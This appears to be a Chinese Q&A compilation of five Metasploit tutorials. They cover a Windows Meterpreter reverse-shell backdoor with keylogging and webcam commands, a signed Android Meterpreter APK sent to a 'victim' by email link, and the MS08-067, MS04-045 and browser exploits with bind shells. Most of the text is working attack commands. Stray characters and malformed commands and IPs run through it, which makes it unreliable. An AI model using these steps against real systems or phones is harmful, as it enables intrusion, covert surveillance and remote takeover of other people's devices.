❶ 如何利用metasploit进行漏洞扫描和攻击
很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。方法步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149x>steup.exe方法步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,灶旅最后就能开始进行监听了,详细情况如下图。打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit-z-j:方法步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步备辩空骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用仿瞎客户端也就是后门程序就能连接都服务端msf,详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外,附meterpreter常用命令:getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景,需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
❷ 如何使用Metasploit对安卓手机进行控制
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一如御凳旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一渣旅个网盘上传我们的APK,并将下载链拆携接分享出去。
这是我们切换到安卓模拟器。
1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
另外要允许安卓安装来历不明的apk。
切换回Kali,我们发现创建了一个新的会话。
然后你就可以为所欲为的操作这台“手机”了。
❸ ms08-067 复现,使用metasploit
时间:2022-03-10
一、环境准备
1、需要腊岁轿轮肆准备英文的windows xp 环境。
链接: https://pan..com/s/1iN6hxbAlRHCaxPXaBiB4_g
2、攻击工具使用的是metasploit,kali 自带。
二、雀好复现时存在的问题
1、安装完xp之后,我自己已经复现了一次,发现拿到的system没有相关命令,可能是这个新系统没有添加到环境中,之后建立了一个文档进行读取,也可直观的看到结果。其他就没遇到什么问题了。
三、复现演示
1、虚拟机准备一下xp,建立一个test的文档,查看一下靶机 IP,靶机建立完成
2、使用metasploit 进行攻击
1)、msfconsole #进入metasploit
2)、search ms08-067 #搜索相关exp
3)、use exploit/windows/smb/ms08_067_netapi #使用这个exp
4)、show payloads #搜索相关payload,能让攻击后建立连接
5)、set payload generic/shell_bind_tcp #我使用的是这个
6)、set RHOST 192.168.154.144 #设置靶机IP,让它攻击这个IP,端口默认是445,这个就不需要设置了
7)、show options #可以用这个命令查看是否把相关配置设置全了
8)、run 或 exploit #进行攻击,两个命令都可以
9)、type test.txt #之后攻击成功了,使用windows命令 就可以去相关路径下查看那个 test 文档了
演示图:
❹ 怎样使用metasploit检测网站
您好,非常高兴为您解答:
使用metasploit检测网站
1.打开metasploit并输入命令show exploits会显示出目前可以使用的exploits;
2.从显示出来的漏洞中找关于windows/browser开头的信息,找到lnk漏洞名称
3.输入命令use exploit名称,使用该漏洞,并输入show options查看详细信息;可以看到默 认设置无需在配置
4.使用show payloads查看该漏洞可以使用的padyload,会显示出很多可用的payloads
5.使用set PAYLOAD payload 来设置该测试使用的payload,我们使用的运世清payload如图所示并设置目标IP为 192.168.1.175,该IP为目标机的IP地址。
6.然后使用exploit来生成漏洞利用程序,
7.将http://192.168.1.177:80/复制并在目标机种打开ie并输入该返袭url,即可完成旁前测试。在metasploit端会显示如下信息,
8.然后该渗透测试已经成功,只需进入该测试产生的sessions即可获得目标机的shell,
本次渗透测试就算成功了并成功获取目标系统的shell,但这个测试的目标机是虚拟机,没有任何主防及杀毒软件。如果打过补丁或者有杀软是很难成功的!
希望可以帮助到您!
❺ 如何安装metasploit
一、搭建metasploit环境
Windows环境下安装
metasploit
安装时需要注意要关闭杀毒软件,如果安装有杀毒软件,会提示在metasploit的安装目录下检测到病毒或木马。
二、metasploit的使用
Metasploit目前提供了三种用磨山户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式。原来还提供一种WEB模式,目前已经不再支持。目前这三种模式各有优缺点,建议在MSF console模式中使用。在console中几颤游李乎可以使用MSF所提供的所有功能,还可以在console中执行一些其它的外部命令,如ping。
Windows下GUI启动方式,从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示茄迟:
其GUI模式启动后界面如图2所示:
Windows下console模式的启动方式与GUI方式类似,启动后界面如图3所示:
Metasploit的使用较为简单,了解其基本命令即可。下面以console的使用方式为例说明如何使用:
输入help或?可查看帮助信息。
下面以exploit中的ms04_045_wins为例进行说明。
1、show exploits,
2、info exploit/windows/wins/ms04_045_wins,查看其描述信息。
3、use exploit/windows/wins/ms04_045_wins,使用此exploit。
4、show options,查看相应的选项
5、set RHOST 192.168.1.200,设置目标
6、set RPORT 7777,设置端口
7、set PAYLOAD generic/shell_bind_tcp,设置使用的shellcode
8、exploit,执行攻击